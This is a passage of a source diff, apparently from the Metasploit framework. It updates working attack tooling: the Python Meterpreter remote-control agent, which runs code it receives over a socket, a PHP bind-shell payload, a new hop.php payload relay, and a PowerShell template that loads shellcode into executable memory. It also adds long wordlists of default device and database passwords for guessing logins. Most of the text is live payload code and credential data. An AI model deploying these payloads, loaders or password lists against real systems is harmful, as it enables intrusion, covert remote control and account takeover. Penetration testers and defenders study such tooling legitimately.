+			end_time = time.time() + 0.5
+			out_data = bytes()
+			while (time.time() < end_time) and (out_data != channel_data):
+				if self.stdout_reader.is_read_ready():
+					out_data = self.stdout_reader.peek(len(channel_data))
+			if out_data == channel_data:
+				self.stdout_reader.read(len(channel_data))
 export(STDProcess)
 
 class PythonMeterpreter(object):
@@ -251,7 +290,7 @@ class PythonMeterpreter(object):
 		self.channels = {}
 		self.interact_channels = []
 		self.processes = {}
-		for func in filter(lambda x: x.startswith('_core'), dir(self)):
+		for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
 			self.extension_functions[func[1:]] = getattr(self, func)
 		self.running = True
 
@@ -265,6 +304,7 @@ class PythonMeterpreter(object):
 		return func
 
 	def add_channel(self, channel):
+		assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
 		idx = 0
 		while idx in self.channels:
 			idx += 1
@@ -286,7 +326,7 @@ class PythonMeterpreter(object):
 					break
 				req_length, req_type = struct.unpack('>II', request)
 				req_length -= 8
-				request = ''
+				request = bytes()
 				while len(request) < req_length:
 					request += self.socket.recv(4096)
 				response = self.create_response(request)
@@ -294,17 +334,17 @@ class PythonMeterpreter(object):
 			else:
 				channels_for_removal = []
 				# iterate over the keys because self.channels could be modified if one is closed
-				channel_ids = self.channels.keys()
+				channel_ids = list(self.channels.keys())
 				for channel_id in channel_ids:
 					channel = self.channels[channel_id]
-					data = ''
+					data = bytes()
 					if isinstance(channel, STDProcess):
 						if not channel_id in self.interact_channels:
 							continue
-						if channel.stdout_reader.is_read_ready():
-							data = channel.stdout_reader.read()
-						elif channel.stderr_reader.is_read_ready():
+						if channel.stderr_reader.is_read_ready():
 							data = channel.stderr_reader.read()
+						elif channel.stdout_reader.is_read_ready():
+							data = channel.stdout_reader.read()
 						elif channel.poll() != None:
 							self.handle_dead_resource_channel(channel_id)
 					elif isinstance(channel, MeterpreterSocketClient):
@@ -312,7 +352,7 @@ class PythonMeterpreter(object):
 							try:
 								d = channel.recv(1)
 							except socket.error:
-								d = ''
+								d = bytes()
 							if len(d) == 0:
 								self.handle_dead_resource_channel(channel_id)
 								break
@@ -357,13 +397,13 @@ class PythonMeterpreter(object):
 		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
 			return ERROR_FAILURE
-		preloadlib_methods = self.extension_functions.keys()
+		preloadlib_methods = list(self.extension_functions.keys())
 		symbols_for_extensions = {'meterpreter':self}
 		symbols_for_extensions.update(EXPORTED_SYMBOLS)
 		i = code.InteractiveInterpreter(symbols_for_extensions)
 		i.runcode(compile(data_tlv['value'], '', 'exec'))
-		postloadlib_methods = self.extension_functions.keys()
-		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
+		postloadlib_methods = list(self.extension_functions.keys())
+		new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
 		for method in new_methods:
 			response += tlv_pack(TLV_TYPE_METHOD, method)
 		return ERROR_SUCCESS, response
@@ -386,10 +426,10 @@ class PythonMeterpreter(object):
 		if channel_id not in self.channels:
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
-		if isinstance(channel, file):
-			channel.close()
-		elif isinstance(channel, subprocess.Popen):
+		if isinstance(channel, subprocess.Popen):
 			channel.kill()
+		elif isinstance(channel, MeterpreterFile):
+			channel.close()
 		elif isinstance(channel, MeterpreterSocket):
 			channel.close()
 		else:
@@ -405,7 +445,7 @@ class PythonMeterpreter(object):
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
 		result = False
-		if isinstance(channel, file):
+		if isinstance(channel, MeterpreterFile):
 			result = channel.tell() >= os.fstat(channel.fileno()).st_size
 		response += tlv_pack(TLV_TYPE_BOOL, result)
 		return ERROR_SUCCESS, response
@@ -432,13 +472,13 @@ class PythonMeterpreter(object):
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
 		data = ''
-		if isinstance(channel, file):
-			data = channel.read(length)
-		elif isinstance(channel, STDProcess):
+		if isinstance(channel, STDProcess):
 			if channel.poll() != None:
 				self.handle_dead_resource_channel(channel_id)
 			if channel.stdout_reader.is_read_ready():
 				data = channel.stdout_reader.read(length)
+		elif isinstance(channel, MeterpreterFile):
+			data = channel.read(length)
 		elif isinstance(channel, MeterpreterSocket):
 			data = channel.recv(length)
 		else:
@@ -454,13 +494,13 @@ class PythonMeterpreter(object):
 			return ERROR_FAILURE, response
 		channel = self.channels[channel_id]
 		l = len(channel_data)
-		if isinstance(channel, file):
-			channel.write(channel_data)
-		elif isinstance(channel, subprocess.Popen):
+		if isinstance(channel, subprocess.Popen):
 			if channel.poll() != None:
 				self.handle_dead_resource_channel(channel_id)
 				return ERROR_FAILURE, response
-			channel.stdin.write(channel_data)
+			channel.write(channel_data)
+		elif isinstance(channel, MeterpreterFile):
+			channel.write(channel_data)
 		elif isinstance(channel, MeterpreterSocket):
 			try:
 				l = channel.send(channel_data)
@@ -485,13 +525,17 @@ class PythonMeterpreter(object):
 		if handler_name in self.extension_functions:
 			handler = self.extension_functions[handler_name]
 			try:
-				#print("[*] running method {0}".format(handler_name))
+				if DEBUGGING:
+					print('[*] running method ' + handler_name)
 				result, resp = handler(request, resp)
-			except Exception, err:
-				#print("[-] method {0} resulted in an error".format(handler_name))
+			except Exception:
+				if DEBUGGING:
+					print('[-] method ' + handler_name + ' resulted in an error')
+					traceback.print_exc(file=sys.stderr)
 				result = ERROR_FAILURE
 		else:
-			#print("[-] method {0} was requested but does not exist".format(handler_name))
+			if DEBUGGING:
+				print('[-] method ' + handler_name + ' was requested but does not exist')
 			result = ERROR_FAILURE
 		resp += tlv_pack(TLV_TYPE_RESULT, result)
 		resp = struct.pack('>I', len(resp) + 4) + resp
@@ -499,6 +543,9 @@ class PythonMeterpreter(object):
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):
-		os.setsid()
+		try:
+			os.setsid()
+		except OSError:
+			pass
 	met = PythonMeterpreter(s)
 	met.run()
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
deleted file mode 100755
index b80d35d745..0000000000
Binary files a/data/meterpreter/metsrv.x64.dll and /dev/null differ
diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll
deleted file mode 100755
index 15efbb9495..0000000000
Binary files a/data/meterpreter/metsrv.x86.dll and /dev/null differ
diff --git a/data/meterpreter/msflinker_linux_x86.bin b/data/meterpreter/msflinker_linux_x86.bin
index 2f6cffe02f..b9e54612a9 100644
Binary files a/data/meterpreter/msflinker_linux_x86.bin and b/data/meterpreter/msflinker_linux_x86.bin differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
deleted file mode 100755
index 7eb1f3f307..0000000000
Binary files a/data/meterpreter/screenshot.x64.dll and /dev/null differ
diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll
deleted file mode 100755
index 3699d2ae0c..0000000000
Binary files a/data/meterpreter/screenshot.x86.dll and /dev/null differ
diff --git a/data/php/bind_tcp.php b/data/php/bind_tcp.php
index a92dfb864e..a987fd4b31 100755
--- a/data/php/bind_tcp.php
+++ b/data/php/bind_tcp.php
@@ -9,24 +9,27 @@ if (is_callable('stream_socket_server')) {
 	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
 	if (!$srvsock) { die(); }
 	$s = stream_socket_accept($srvsock, -1);
+	fclose($srvsock);
 	$s_type = 'stream';
 } elseif (is_callable('socket_create_listen')) {
 	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } elseif (is_callable('socket_create')) {
 	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
 	$res = socket_bind($srvsock, $ipaddr, $port);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } else {
 	die();
 }
 if (!$s) { die(); }
 
-switch ($s_type) { 
+switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }
@@ -40,7 +43,7 @@ $len = $a['len'];
 
 $b = '';
 while (strlen($b) < $len) {
-	switch ($s_type) { 
+	switch ($s_type) {
 	case 'stream': $b .= fread($s, $len-strlen($b)); break;
 	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
 	}
diff --git a/data/php/hop.php b/data/php/hop.php
new file mode 100644
index 0000000000..c9f323657a
--- /dev/null
+++ b/data/php/hop.php
@@ -0,0 +1,68 @@
+<?php
+$magic = 'TzGq';
+$tempdir = sys_get_temp_dir() . "/hop" . $magic;
+if(!is_dir($tempdir)){
+	mkdir($tempdir); //make sure it's there
+}
+
+//get url
+$url = $_SERVER["QUERY_STRING"];
+//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
+
+//Looks for a file with a name or contents prefix, if found, send it and deletes it
+function findSendDelete($tempdir, $prefix, $one=true){
+	if($dh = opendir($tempdir)){
+		while(($file = readdir($dh)) !== false){
+			if(strpos($file, $prefix) !== 0){
+				continue;
+			}
+			readfile($tempdir."/".$file);
+			unlink($tempdir."/".$file);
+			if($one){
+				break;
+			}
+		}
+	}
+}
+
+//handle control
+if($url === "/control"){
+	if($_SERVER['REQUEST_METHOD'] === 'POST'){
+		//handle data for payload - save in a "down" file or the "init" file
+		$postdata = file_get_contents("php://input");
+		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
+			$f = fopen($tempdir."/init", "w"); //only one init file
+		}else{
+			$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
+			$f = fopen(tempnam($tempdir,$prefix), "w");
+		}
+		fwrite($f, $postdata);
+		fclose($f);
+	}else{
+		findSendDelete($tempdir, "up_", false);
+	}
+}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
+	//get data
+	$postdata = file_get_contents("php://input");
+	//See if we should send anything down
+	if($postdata === 'RECV'){
+		findSendDelete($tempdir, "down_" . bin2hex($url));
+		$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
+	}else{
+		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
+	}
+	//find free and write new file
+	$f = fopen($fname, "w");
+	fwrite($f, $magic);
+	//Little-endian pack length and data
+	$urlen = strlen($url);
+	fwrite($f, pack('V', $urlen));
+	fwrite($f, $url);
+	$postdatalen = strlen($postdata);
+	fwrite($f, pack('V', $postdatalen));
+	fwrite($f, $postdata);
+	fclose($f);
+//Initial query will be a GET and have a 12345 in it
+}else if(strpos($url, "12345") !== FALSE){
+	readfile($tempdir."/init");
+}
diff --git a/data/templates/scripts/to_mem_old.ps1.template b/data/templates/scripts/to_mem_old.ps1.template
index bbd85c1bfb..772fef7baf 100644
--- a/data/templates/scripts/to_mem_old.ps1.template
+++ b/data/templates/scripts/to_mem_old.ps1.template
@@ -11,10 +11,10 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
 
 %{shellcode}
 
-$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
 
 for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
-	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
 }
 
 $%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
diff --git a/data/webcam/answerer.html b/data/webcam/answerer.html
index dadb7e32f5..13542c299d 100644
--- a/data/webcam/answerer.html
+++ b/data/webcam/answerer.html
@@ -10,7 +10,7 @@
 		height: 480px;
 		width: 640px;
 		border-radius: 15px;
-		-moz-border-raidus: 15px;
+		-moz-border-radius: 15px;
 		background-color: black;
 		position: absolute;
 		left: 50;
@@ -26,7 +26,7 @@
 		height: 180px;
 		width: 200px;
 		border-radius: 15px;
-		-moz-border-raidus: 15px;
+		-moz-border-radius: 15px;
 		background-color: #9B9B9B;
 		position: absolute;
 		top: 480;
@@ -66,8 +66,9 @@
 		left: 10;
 	}
 </style>
-<script src="=WEBRTCAPIJS="> </script>
 <script>
+	=WEBRTCAPIJS=
+
 	window.onerror = function(e) {
 		document.getElementById("message").innerHTML = "Error: " + e.toString();
 	}
diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html
index f52a15e352..8bd7cb5a48 100644
--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@@ -2,6 +2,10 @@
 <head>
 	<title>Video session</title>
 	<style type="text/css">
+		body {
+			background: #fff;
+		}
+
 		div.dot1 {
 			position: absolute;
 			width: 20px;
@@ -84,8 +88,9 @@
 		}
 	</style>
 
-	<script src="api.js"> </script>
 	<script>
+		=WEBRTCAPIJS=
+
 		var channel = '=CHANNEL=';
 		var websocket = new WebSocket('ws://=SERVER=');
 
@@ -136,10 +141,12 @@
 		};
 
 		window.onload = function() {
-			getUserMedia(function(stream) {
-				peer.addStream(stream);
-				peer.startBroadcasting();
-			});
+			setTimeout(function(){
+				getUserMedia(function(stream) {
+					peer.addStream(stream);
+					peer.startBroadcasting();
+				});
+			}, 500);
 		};
 
 		function getUserMedia(callback) {
diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt
new file mode 100644
index 0000000000..7203bcda29
--- /dev/null
+++ b/data/wordlists/default_pass_for_services_unhash.txt
@@ -0,0 +1,1214 @@
+admin
+
+password
+1234
+epicrouter
+sysadm
+access
+root
+tech
+smcadmin
+0
+pass
+system
+PASSWORD
+Symbol
+guest
+bintec
+security
+synnet
+manager
+adtran
+motorola
+smile
+cascade
+BRIDGE
+netman
+super
+switch
+setup
+changeme
+operator
+user
+Cisco
+Manager
+TJM
+apc
+cisco
+letmein
+router
+trancell
+ascend
+friend
+NetICs
+blender
+netscreen
+SKY_FOX
+public
+Master
+default
+laflaf
+cmaker
+RSX
+Posterie
+private
+attack
+monitor
+xdfk9874t3
+netopia
+Col2ogro2
+microbusiness
+op
+OCS
+secure
+atlantis
+sysadmin
+5777364
+echo
+maint
+SESAME
+danger
+lucenttech2
+d.e.b.u.g
+hello
+SYSTEM
+calvin
+xxyyzz
+highspeed
+123
+Sharp
+mysweex
+4tas
+masterkey
+0000
+permit
+barricade
+support
+tslinux
+hp.com
+recovery
+PASSW0RD
+engineer
+administrator
+pwp
+isee
+NETWORK
+JDE
+superuser
+Super
+admin123
+surt
+rwa
+123456
+NetCache
+ADTRAN
+USER
+test
+extendnet
+ironport
+lp
+1111
+PASS
+ro
+Ascend
+_Cisco
+MAIL
+sitecom
+hsadb
+CAROLIAN
+ADMINISTRATOR
+sysAdmin
+tini
+Helpdesk
+SERVICE
+PBX
+FIELD.SUPPORT
+sys
+abc123
+1502
+star
+MGR.SYS
+anicust
+Administrator
+Intel
+12345
+lucenttech1
+secret
+piranha
+wlsedb
+l3
+diamond
+naadmin
+1988
+radius
+MANAGER.SYS
+raidzone
+3ascotel
+HPOFFICE
+demo
+166816
+Password
+zoomadsl
+D-Link
+l2
+CCC
+rw
+cgadmin
+specialist
+NetVCR
+COGNOS
+q
+MServer
+cms500
+davox
+enquirypw
+at4400
+h179350
+asd
+240653C9467E45
+atc123
+admin_1
+266344
+WORD
+ITF3000
+connect
+HPONLY
+nmspw
+client
+comcomcom
+speedxess
+ROBELLE
+uplink
+SYS
+letacla
+FORCE
+REMOTE
+backdoor
+CNAS
+22222
+gen2
+medion
+admn
+56789
+PRODDTA
+tellabs#1
+dadmin01
+dhs3mt
+SECURITY
+changeme!
+llatsni
+adfexc
+Asante
+!manage
+21241036
+TELESUP
+crftpw
+help
+lantronix
+netadmin
+HP
+SUPPORT
+VESOFT
+$secure$
+OP.OPERATOR
+hs7mwxkk
+patrol
+SUPER
+SMDR
+1064
+DISC
+cellit
+INTX3
+inads
+tlah
+wyse
+locatepw
+visual
+r@p8p0r+
+xbox
+TENmanUFactOryPOWER
+device
+NICONEX
+admin1234
+fivranne
+acc
+31994
+bcimpw
+bluepw
+PlsChgMe
+R1QTPS
+ccrusr
+MPE
+telecom
+gen1
+SSA
+snmp-Trap
+HTTP
+mtch
+adslolitec
+ganteng
+bciimpw
+browsepw
+Admin
+change_on_install
+changeme2
+Exabyte
+rmnetlm
+replicator
+intel
+HPP196
+radware
+intermec
+mlusr
+RJE
+LOTUS
+initpw
+e250changeme
+SpIp
+adminttd
+field
+supportpw
+MiniAP
+RIP000
+XLSERVER
+HPP187
+HPP189
+indspw
+linga
+craft
+enter
+NAU
+rcustpw
+AitbISP4eCiG
+mtcl
+CONV
+bcnaspw
+NETBASE
+REGO
+cacadmin
+mediator
+talent
+kermit
+x-admin
+HPDESK
+9999
+ROOT500
+my_DEMARC
+volition
+GlobalAdmin
+4getme2
+UI-PSWD-01
+2222
+UI-PSWD-02
+TCH
+Fireport
+ILMI
+maintpw
+supervisor
+e500changeme
+mu
+NULL
+custpw
+noway
+tiaranet
+bcmspw
+TANDBERG
+m1122
+telco
+xd
+dhs3pms
+winterm
+craftpw
+rwmaint
+any@
+looker
+none
+MANAGER
+1234admin
+MGR
+tuxalize
+timely
+User
+8429
+manage
+Babylon
+hagpolm1
+scmchangeme
+tivonpw
+installer
+webadmin
+pbxk1064
+19920706
+pento
+NetSurvibox
+D_SYSTPW
+3477
+$chwarzepumpe
+asecret
+10023
+help1954
+corecess
+master
+Protector
+HPWORD
+symbol
+weblogic
+sys/change_on_install
+3ep5w2u
+8111
+jannie
+tomcat
+pilou
+3ware
+ANYCOM
+tiger123
+asante
+smallbusiness
+ntacdmax
+w2402
+wlsepassword
+kilo1987
+articon
+michelangelo
+Mau'dib
+Serial
+ggdaseuaimhrke
+maintain
+syslib
+init
+PUBSUB
+CTXSYS
+bill
+60020
+dmr99
+GUEST
+06071992
+Trintech
+otbu+1
+Multi
+babbit
+w0rkplac3rul3s
+Telecom
+qsysopr
+imss7.0
+nokia
+APPS
+isdev
+mail
+draadloos
+qsecofr
+default.password
+5678
+nimdaten
+456
+P@55w0rd!
+par0t
+db2fenc1
+control
+isp
+QSRV
+iDirect
+MDSYS
+vpasp
+TEST
+QSECOFR
+2501
+leviton
+blank
+informix
+mpegvideo
+games
+0P3N
+hawk201
+scout
+qpgmr
+admin000
+expert03
+images
+surecom
+Geardog
+symantec
+adslroot
+xyzzy
+adaptec
+serial#
+BACKUP
+stratauser
+rootme
+!root
+webibm
+riverhead
+COMPANY
+DSL
+amber
+eagle
+brightmail
+HEWITT
+ods
+toplayer
+OkiLAN
+rootpass
+wrgg15_di524
+x40rocks
+nokai
+Admin1
+ImageFolio
+iolan
+pfsense
+sales
+iscopy
+OEM_TEMP
+RSAAppliance
+themaster01
+ANS#150
+passwort
+welcome
+NetSeq
+BRIO_ADMIN
+citel
+oracle
+kn1TG7psLu
+SYSPASS
+lkwpeter
+DEV2000_DEMOS
+checkfs
+USER1
+resumix
+HELP
+logapp
+0RACLE9
+0RACLE8
+57gbzb
+qsrvbas
+sldkj754
+STRAT_PASSWD
+19750407
+USERP
+primeos
+OEMREP
+[^_^]
+USER6
+TTPTHA
+powerdown
+Mau’dib
+ORACL3
+nimda
+DEMO
+2WSXcder
+ALLIN1
+sysadmpw
+QSRVBAS
+ip305Beheer
+ACCORD
+AQJAVA
+LASERWRITER
+nsi
+PERFSTAT
+MBWATCH
+protection
+unix
+OWNER
+NETPRIV
+AWARD?SW
+changethis
+SYMPA
+REP_OWNER
+DCL
+dbps
+ARCHIVIST
+basisk
+demos
+NETMGR
+OAS_PUBLIC
+AP
+j5Brn9
+MTSSYS
+DIGITAL
+AUDIOUSER
+teX1
+allot
+$SRV
+0RACLE
+nicecti
+ROOT
+PRINTER
+m1link
+l1
+trouble
+trendimsa1.0
+HOST
+ADLDEMO
+QS_ADM
+AMI
+OPER
+PO7
+komprie
+MAINT
+toor
+AMISETUP
+sp99dd
+halt
+MSHOME
+secacm
+3Com
+db2admin
+Airaya
+visor
+Wireless
+IMEDIA
+Biostar
+install
+primos
+infrant1
+Partner
+Administrative
+USER_TEMPLATE
+pnadmin
+h6BB
+lpadmin
+VTAM
+TRACE
+POSTMASTER
+MAILER
+QS_WS
+sma
+system_admin
+nobody
+Tasmannet
+!admin
+DISCOVERER_ADMIN
+LR-ISDN
+TURBINE
+GL
+PO
+AMI_SW
+superpass
+YES
+GATEWAY
+PRIMARY
+award.sw
+lucy99
+pwpw
+EMP
+cclfb
+SITEMINDER
+Any
+vgnadmin
+NEWS
+Ektron
+Award
+AQUSER
+UTLESTAT
+AMIAMI
+netbotz
+CHANGE_ON_INSTALL
+sap123
+Crystal
+Daewuu
+ftp
+(random
+MCUser1
+admpw
+rootadmin
+PM
+ULTIMATE
+role1
+enhydra
+NF
+EVENT
+xyzall
+rainbow
+JETSPEED
+PORTAL30_SSO_PS
+OO
+WKSYS
+OPERATNS
+ksdjfg934t
+merlin
+OE
+Local
+OCITEST
+HLT
+last
+CTXDEMO
+zebra
+QDBA
+LRISDN
+tele
+WEBCAL01
+rsadmin
+ORACLE
+alien
+sanfran
+ReadOnly
+AMIPSWD
+MOREAU
+abd234
+QNX
+dnnhost
+sertafu
+ORDPLUGINS
+telos
+ADMIN
+adminpass
+crash
+ACCESS
+SDOS_ICSAP
+adminpwd
+BATCH
+GUESTGUEST
+SYSMAINT
+postmast
+DSSYS
+award_ps
+ZAAADA
+MGWUSER
+NTCIP
+hewlpack
+TDOS_ICSAP
+ssp
+EJSADMIN
+damin
+INGRES
+A.M.I
+1322222
+VCSRV
+storageserver
+ssladmin
+CLOTH
+shutdown
+OEMADM
+restoreonly1
+quser
+MILLER
+trmcnfg
+REPORT
+aLLy
+tour
+mountfsys
+PROG
+iwill
+Public
+mp3mystic
+hpt
+peribit
+STARTER
+GUESTGUE
+guardone
+daemon
+mountsys
+ORACLE9
+ORACLE8
+gandalf
+backuponly1
+leaves
+syspw
+blablabla
+Compleri
+USER3
+OPENSPIRIT
+spooml
+changeit
+wg
+Vextrex
+qsvr
+lynx
+Sysop
+IMAGEUSER
+bsxpass
+USER9
+ax400
+OPERATOR
+Mau?dib
+MASTER
+t00lk1t
+Daytec
+SZYX
+CTX_123
+rje
+MTRPW
+QS_ES
+mysecretpassword0*
+GPLD
+uucp
+DBSNMP
+TSEUG
+SWUSER
+8RttoTriz
+Operator
+honey
+accounting
+backuprestore1
+PRINT
+j322
+Craftr4
+dni
+*3noguru
+FAX
+anon
+j256
+USER8
+PORTAL30_SSO_PUBLIC
+589721
+WINSABRE
+shs
+PORTAL30_SSO
+ALLIN1MAIL
+xo11nE
+nms
+SYSADM
+me
+NFI
+SECDEMO
+AR#Admin#
+ORAREGSYS
+SNOWMAN
+LASER
+?award
+WLAN_AP
+WWW
+VAX
+Cable-docsis
+UNKNOWN
+LdapPassword_1
+3
+Zenith
+setup/nopasswd
+DSGATEWAY
+CSMIG
+year2000
+umountfsys
+BIGO
+jstwo
+VMS
+bpel
+viewuser1
+ISPMODE
+correct
+conexant
+ip3000
+COMPIERE
+OSP22
+guest1
+FORSE
+lesarotl
+factory
+(unknown)
+ip20
+ip21
+QUSER
+AWARD
+prime
+tr650
+poll
+j262
+xljlbj
+glftpd
+Advance
+RMAN
+mountfs
+console
+firstsite
+SW_AWARD
+snake
+Gateway
+TSUSER
+123123
+3098z
+cc
+nopasswd
+WebBoard
+SYS1
+BC4J
+phpreactor
+OPERVAX
+Congress
+central
+WANGTEK
+etas
+OWA
+USER2
+jasperadmin
+uClinux
+guestgue
+FAXUSER
+SABRE
+ip400
+AMI.KEY
+AMI.KEZ
+inuvik49
+11111111
+qsrv
+PORTAL31
+PORTAL30
+XPRT
+zjaaadc
+ilom-admin
+rdc123
+sysopr
+tasmannet
+0RACLE8I
+store
+SER
+IP
+WEBREAD
+ODM
+INVALID
+WOOD
+vertex25
+bin
+lineprin
+www
+dbpass
+$rfmngr$
+sync
+SYSTEST
+user0000
+ilom-operator
+HELGA-S
+NETNONPRIV
+CIDS
+primenet
+redline
+muze
+MBMANAGER
+FND
+WINDOWS_PASSTHRU
+USER4
+hqadmin
+123qwe
+BASE
+dn_04rjc
+uucpadm
+FAXWORKS
+password1
+EXFSYS
+JMUSER
+imsa7.0
+NETFRAME
+CIS
+ciscofw
+HLW
+brocade1
+pwrchute
+Tiny
+svcPASS83
+nsa
+!ishtar
+NeXT
+TELEDEMO
+AMIDECOD
+recover
+TRAVEL
+efmukl
+raritan
+PO8
+NAMES
+secofr
+biostar
+USER7
+OWA_PUBLIC
+questra
+builtin
+6071992
+boss
+isolation
+Q54arwms
+PLEX
+OLAPDBA
+g6PJ
+INSTANCE
+pixmet2003
+Lund
+ibmcel
+CMSBATCH
+ABCD
+AM
+condo
+Toshiba
+familymacintosh
+TAHITI
+NEWINGRES
+AMI?SW
+mMmM
+man
+powerapp
+service
+VIF_DEV_PWD
+WELCOME
+Barricade
+joeuser
+HELPDESK
+wlpisystem
+prtgadmin
+CONCAT
+t0ch88
+webmaster
+djonet
+Compaq
+CISINFO
+dottie
+QS_CB
+CDEMORID
+nician
+MANAG3R
+PORTAL30_PUBLIC
+nortel
+CLERK
+FIELD
+SECRET123
+Guest
+amigosw1
+xmux
+SENTINEL
+ducati900ss
+22222222
+lkw
+awkward
+TzqF
+SYSTEST_CLIG
+ODS
+axis2
+PAPER
+TSDEV
+joh316
+dos
+hdms
+phplist
+novell
+CISSUS
+passw0rd
+trade
+kronites
+QS_CBADM
+SYSA
+00000000
+STUDENT
+SECONDARY
+OOOOOOOO
+xceladmin
+j64
+MTS_PASSWORD
+AWARD_SW
+AQDEMO
+ReadWrite
+GWrv
+MagiMFP
+SnuFG5
+IS_$hostname
+badg3r5
+ORASSO
+t0ch20x
+SH
+zeosx
+X#1833
+wodj
+FOOBAR
+SYSMAN
+urchin
+PORTAL30_DEMO
+QS_CS
+PlsChgMe!
+MCUrv
+adminadmin
+userNotU
+AMI~
+ibm
+ncadmin
+TESTPILOT
+Polrty
+UETP
+QS
+MUMBLEFRATZ
+AIROPLANE
+APPS_MRC
+uboot
+netgear1
+asd123
+PDP11
+aammii
+SLIDEPW
+bagabu
+Spacve
+256256
+INFO
+checkfsys
+PRODCICS
+foolproof
+AWARD_PW
+MXAGENT
+ORACLE8I
+no
+POWERCARTUSER
+QDI
+shiva
+distrib0
+SUPERVISOR
+MIGRATE
+CDEMOUCB
+c
+sysbin
+signa
+autocad
+SWITCHES_SW
+WEBDB
+aPAf
+ncrm
+SAMPLE
+1
+HCPARK
+ALLINONE
+nm2user
+PATROL
+technolgi
+MBIU0
+adm
+tutor
+CHEY_ARCHSVR
+software
+bbs
+Dell
+disttech
+zbaaaca
+prost
+ORDSYS
+1234567890
+gopher
+RM
+s!a@m#n$p%c
+DECNET
+OPERATIONS
+PANAMA
+SHELVES
+4Dgifts
+biosstar
+NETSERVER
+tiny
+APC
+USER5
+GPFD
+12345678
+QS_OS
+REPADMIN
+DEMO8
+DEMO9
+CDEMO82
+boca
+vision2
+umountsys
+snmp
+USER0
+CDEMOCOR
+Rodopi
+NONPRIV
+tatercounter2000
+qserv
+ESSEX
+AQ
+SAP
+VRR1
+fw
+FINANCE
+ESTORE
+fax
+VIRUSER
+LINK
+FNDPUB
+BIOS
+overseer
+checksys
+umountfs
+DBDCCIC
+x6zynd56
+TOAD
+mozart
+ntpupdate
+HARRIS
+11111
+DECMAIL
+dnnadmin
+nsroot
+advcomm500349
+dvst10n
+SERVICECONSUMER1
+MMO2
+NOC
+WWWUSER
+SAPR3
+t0talc0ntr0l4!
+ODSCOMMON
+fal
+pixadmin
+BIOSPASS
+netlink
+L2LDEMO
+OUTLN
+tiger
+toshy99
+dbase
+nz0u4bbe
+fam
+bell9
+Oper
+RMAIL
+exinda
+PRIV
+barney
+biodata
+24Banc81
+news
+j09F
+pw
+ilon
+award_?
+0RACLE39
+0RACLE38
+DEFAULT
+AMI!SW
+SUPERSECRET
+alpine
+18140815
+APPUSER
+CENTRA
+LBACSYS
+alfarome
+PDP8
+*
+lpadm
+Everything
+bewan
+2580
+DIP
+Sxyz
+mfd
+MDDEMO
+589589
+SWPRO
+DES
+fibranne
+rodopi
+touchpwd=
+Tiger
+4tugboat
+funkwerk
+SWORDFISH
+657
+SYSLIB
+NETCON
+STEEL
+author
+web
+PUBSUB1
+D_SYSPW
+CATALOG
+IBM
+RE
+MFG
+POST
+HPLASER
+HR
+VIDEO
+SQL
+CMOSPWD
+dadmin
+wlcsystem
diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt
new file mode 100644
index 0000000000..ff0458f94b
--- /dev/null
+++ b/data/wordlists/default_userpass_for_services_unhash.txt
@@ -0,0 +1,1787 @@
+admin admin
+ 
+admin 
+ admin
+admin password
+admin 1234
+root 
+Administrator admin
+admin epicrouter
+sysadm sysadm
+ 1234
+ password
+ access
+root root
+tech tech
+ smcadmin
+ 0
+Administrator 
+root pass
+ system
+root admin
+ PASSWORD
+ Symbol
+operator 
+guest guest
+admin bintec
+security security
+guest 
+debug synnet
+manager manager
+ adtran
+admin motorola
+service smile
+ cascade
+admin 0
+!root 
+user password
+ BRIDGE
+netman netman
+super super
+admin switch
+admin setup
+admin changeme
+diag switch
+operator operator
